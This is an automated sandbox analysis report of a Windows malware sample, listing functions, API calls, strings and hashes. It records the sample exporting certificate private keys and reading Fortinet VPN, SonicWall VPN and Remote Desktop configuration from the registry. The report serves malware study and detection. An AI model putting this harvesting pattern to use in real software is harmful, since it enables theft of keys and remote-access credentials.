                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
                                                                                                                                        • String ID: & echo
                                                                                                                                        • API String ID: 2711250446-3491486023
                                                                                                                                        • Opcode ID: 2d6ebe6036ec555fde6b5a2d1141e9a7e3c1177d779b4c0a60f4d7d1f5e2e413
                                                                                                                                        • Instruction ID: a2f53be82321afe8e9735e4598150c36c399b95afb77aa72ddb59fbd8ac7b046
                                                                                                                                        • Opcode Fuzzy Hash: 2d6ebe6036ec555fde6b5a2d1141e9a7e3c1177d779b4c0a60f4d7d1f5e2e413
                                                                                                                                        • Instruction Fuzzy Hash: 4D515521A0964281EF20DB55E5952FA7751FF86B8CF484231CDAEC7AC5EEBCE445CB20
                                                                                                                                        Function 00007FF6F2D67138 Relevance: 4.5, APIs: 3, Instructions: 38comCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Initialize$CreateInstanceSecurity
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 89549506-0
                                                                                                                                        • Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                                                                        • Instruction ID: d51061fa72e4597b1a161e07fa5b2f50b3bbf85bb775f1f5927adafc664dd234
                                                                                                                                        • Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                                                                        • Instruction Fuzzy Hash: DE118C73A14640CAF7108F61E8593AE7778F34470DF508319DA595A998CF7CD245CF94
                                                                                                                                        Function 00007FF6F2D625B4 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 682 7ff6f2d625b4-7ff6f2d625b7 683 7ff6f2d625da 682->683 684 7ff6f2d625b9-7ff6f2d625d9 GetProcessHeap RtlFreeHeap 682->684 684->683
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                        • Opcode ID: ca99f4615b15245bd189999287ccb852a0eef4e8e1b2b120ab7ad689b7598bda
                                                                                                                                        • Instruction ID: 43963463a4f71c76262456641233c32042c430cf5f112d489e032a989eb6f8f3
                                                                                                                                        • Opcode Fuzzy Hash: ca99f4615b15245bd189999287ccb852a0eef4e8e1b2b120ab7ad689b7598bda
                                                                                                                                        • Instruction Fuzzy Hash: 3FC01254E0664242FF2897E3246907153556F59B89B084334CD2A49B91AD6C91D54A14
                                                                                                                                        Function 00007FF6F2D62D5C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 253encryptiontimeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6F2D62D90
                                                                                                                                        • CertGetNameStringW.CRYPT32 ref: 00007FF6F2D62DD3
                                                                                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF6F2D62EB8
                                                                                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF6F2D62F0A
                                                                                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF6F2D62F4B
                                                                                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF6F2D62FC1
                                                                                                                                          • Part of subcall function 00007FF6F2D61A70: wvsprintfW.USER32 ref: 00007FF6F2D61AA9
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
                                                                                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6F2D63178
                                                                                                                                          • Part of subcall function 00007FF6F2D63220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D6325E
                                                                                                                                          • Part of subcall function 00007FF6F2D63220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6F2D6328D
                                                                                                                                          • Part of subcall function 00007FF6F2D63220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D632BB
                                                                                                                                          • Part of subcall function 00007FF6F2D63220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63336
                                                                                                                                          • Part of subcall function 00007FF6F2D63220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63380
                                                                                                                                          • Part of subcall function 00007FF6F2D63220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D633AC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
                                                                                                                                        • String ID: 1.2.840.113549
                                                                                                                                        • API String ID: 2787208766-3888290641
                                                                                                                                        • Opcode ID: 85948b718ba4c0424fff8cc534e9ee0ea835ac6a641d6d756b78f4ebc14a72b9
                                                                                                                                        • Instruction ID: e0a1a1a054d25b2294c2535928a88fb3e0ba21f7c8b2a4c7b5e713965bf3188b
                                                                                                                                        • Opcode Fuzzy Hash: 85948b718ba4c0424fff8cc534e9ee0ea835ac6a641d6d756b78f4ebc14a72b9
                                                                                                                                        • Instruction Fuzzy Hash: EFB1D862A0864285E750DF51D4912BEBB65FB85BC8F400232EEAD87B99EFBCD105CF50
                                                                                                                                        Function 00007FF6F2D6900C Relevance: 13.6, APIs: 9, Instructions: 137pipeprocessCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorLast$Pipe$CloseHandleProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2620922840-0
                                                                                                                                        • Opcode ID: 9267b008a02f924b6b5bef3e080468482ce769ef973b61c06ce0dc36898bb274
                                                                                                                                        • Instruction ID: f77515d733bd0e39f69a9e696a138693193585dcb236dfd2aac669bf5c8c3e43
                                                                                                                                        • Opcode Fuzzy Hash: 9267b008a02f924b6b5bef3e080468482ce769ef973b61c06ce0dc36898bb274
                                                                                                                                        • Instruction Fuzzy Hash: C8518F32B08A0289EB10DF61D4953EC37A5AB5978CF414235DE1DDBA99EEBCD109CB50
                                                                                                                                        Function 00007FF6F2D62BAC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65encryptionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cert$NameStore$CertificatesCloseEnumOpenString
                                                                                                                                        • String ID: +ss$+sls$fs{s${s{s
                                                                                                                                        • API String ID: 3617724111-3691527440
                                                                                                                                        • Opcode ID: 041190dec486dc00a696f8e4274d1a1c3cacc9eb9b54fbdfd046d7e1b3a2024b
                                                                                                                                        • Instruction ID: 5fc4a1eb80dd19758a80b5ef4847eb037f0d40b97545a4b472b75f066c5c2087
                                                                                                                                        • Opcode Fuzzy Hash: 041190dec486dc00a696f8e4274d1a1c3cacc9eb9b54fbdfd046d7e1b3a2024b
                                                                                                                                        • Instruction Fuzzy Hash: 7321C732A1868281E750DB11E4843A97765FB85B84F045232EAAEC7789EE7CD4048F50
                                                                                                                                        Function 00007FF6F2D62B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34encryptionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CertEnumStoreSystem
                                                                                                                                        • String ID: ":{$"_":""
                                                                                                                                        • API String ID: 4132996702-2026347918
                                                                                                                                        • Opcode ID: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
                                                                                                                                        • Instruction ID: a524aae2f428ae3e24fd0eed99c1f59917032cd737dca5e27c1f4dc91f496e2b
                                                                                                                                        • Opcode Fuzzy Hash: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
                                                                                                                                        • Instruction Fuzzy Hash: CB01A711E0864241FB04D716E4412B9675DAF95BC8F485732DD3DC77DAAFACD1428B10
                                                                                                                                        Function 00007FF6F2D631C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22encryptionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CertEnumLocationStoreSystem
                                                                                                                                        • String ID: "_": ""
                                                                                                                                        • API String ID: 863500693-1453221996
                                                                                                                                        • Opcode ID: ec0cdce72799e486ace2b0816923927e4b5d0f16a198642160ee6ca1f8e93389
                                                                                                                                        • Instruction ID: da40635f3ef4766a8b4723598623af559d24a94ebbb870e41af56840f55c50d9
                                                                                                                                        • Opcode Fuzzy Hash: ec0cdce72799e486ace2b0816923927e4b5d0f16a198642160ee6ca1f8e93389
                                                                                                                                        • Instruction Fuzzy Hash: E4E06551B1850340EF44AB62A8962F427185F597C8F4C2232D83EC63D6FDACD0858B20
                                                                                                                                        Function 00007FF6F2D6968C Relevance: 3.0, APIs: 2, Instructions: 42filepipeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileNamedPeekPipeRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 327342812-0
                                                                                                                                        • Opcode ID: 34d1d673edd9c40d02f270326efd511933567532b5db1aeb081074a9eac190bf
                                                                                                                                        • Instruction ID: 25d817d01092f172318f8bf8594061935ce2610c3b0e31d8ec64ab819dace8d5
                                                                                                                                        • Opcode Fuzzy Hash: 34d1d673edd9c40d02f270326efd511933567532b5db1aeb081074a9eac190bf
                                                                                                                                        • Instruction Fuzzy Hash: 7E01923271868287E7108B52E4857BAB7A1EB96BDCF148234DA58CB794EFFCD4448F10
                                                                                                                                        Function 00007FF6F2D695A0 Relevance: 3.0, APIs: 2, Instructions: 39synchronizationCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2021502500-0
                                                                                                                                        • Opcode ID: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
                                                                                                                                        • Instruction ID: b747efa84414956934f193ba1e51a97e76100945a9f574ed1965a49e7ba42e5e
                                                                                                                                        • Opcode Fuzzy Hash: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
                                                                                                                                        • Instruction Fuzzy Hash: 34012922A086C282EF508F65D4903B937A5EF85B8CF145631CA2DC65C9EFADDC85CB20
                                                                                                                                        Function 00007FF6F2D62654 Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF6F2D61951,?,?,00000000,00007FF6F2D619BA), ref: 00007FF6F2D62669
                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,?,?,00007FF6F2D61951,?,?,00000000,00007FF6F2D619BA), ref: 00007FF6F2D6267A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1357844191-0
                                                                                                                                        • Opcode ID: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                                                                                        • Instruction ID: d1d0807e15f710fe6865df3db8348367bc455f63fdf50b67302238492d704a08
                                                                                                                                        • Opcode Fuzzy Hash: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                                                                                        • Instruction Fuzzy Hash: A3E08615A085C281EB189BD2B9A40756625AF49BC8F088330DD2E47BD5ED6CD8454F20
                                                                                                                                        Function 00007FF6F2D61A70 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 685 7ff6f2d61a70-7ff6f2d61ab8 call 7ff6f2d61918 wvsprintfW
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wvsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2795597889-0
                                                                                                                                        • Opcode ID: dd0fe6c676249214c66d74395a2174ea02b493f73ae380c8d3cb8aeb877b2744
                                                                                                                                        • Instruction ID: fca94b04056fcabe7986ddb8474854f63d578387de564ba26768f874a12c6d9f
                                                                                                                                        • Opcode Fuzzy Hash: dd0fe6c676249214c66d74395a2174ea02b493f73ae380c8d3cb8aeb877b2744
                                                                                                                                        • Instruction Fuzzy Hash: DEE06DB2A00B45C2D7048F15E98108C7B79FB99FC8B54C125CB4857364DF38D996CB60
                                                                                                                                        Function 00007FF6F2D679C4 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 688 7ff6f2d679c4-7ff6f2d679d9 GetNativeSystemInfo 689 7ff6f2d679db-7ff6f2d679e1 688->689 690 7ff6f2d679e7 688->690 689->690 691 7ff6f2d679e3-7ff6f2d679e5 689->691 692 7ff6f2d679e9-7ff6f2d679ed 690->692 691->692
                                                                                                                                        APIs
                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF6F2D674DE), ref: 00007FF6F2D679CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1721193555-0
                                                                                                                                        • Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                                                        • Instruction ID: 2d0d28360ff1b498021be3eb41f858d4ada5a0aab9784f3947aa6043cfb0d382
                                                                                                                                        • Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                                                        • Instruction Fuzzy Hash: 02D05E02C0848682EB316B00945713632A1FF5930CFC00332C1AD824E07FACD7899E26

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00007FF6F2D6DC0C Relevance: 54.7, APIs: 16, Strings: 15, Instructions: 436filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                                                                                        • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                                                                                        • API String ID: 2508640211-1951492331
                                                                                                                                        • Opcode ID: 95f97117d68d64b6bf25aee9c45f7644639b940521229bd54e3b0bc6304baee3
                                                                                                                                        • Instruction ID: 6cbca81cbdb4c4a1060cd56d5170f5e19f5ebb1b13a7b73e10fa7896408bad43
                                                                                                                                        • Opcode Fuzzy Hash: 95f97117d68d64b6bf25aee9c45f7644639b940521229bd54e3b0bc6304baee3
                                                                                                                                        • Instruction Fuzzy Hash: 9F12C221A1858245EB10EB61D8953F93765AF867C8F804332E92DC7BDAFFACD505CB20
                                                                                                                                        Function 00007FF6F2D63220 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 313encryptionmemorylibraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D6325E
                                                                                                                                        • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6F2D6328D
                                                                                                                                        • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D632BB
                                                                                                                                          • Part of subcall function 00007FF6F2D636F0: CryptExportKey.ADVAPI32 ref: 00007FF6F2D63744
                                                                                                                                          • Part of subcall function 00007FF6F2D636F0: CryptExportKey.ADVAPI32 ref: 00007FF6F2D6379E
                                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63336
                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63380
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D633AC
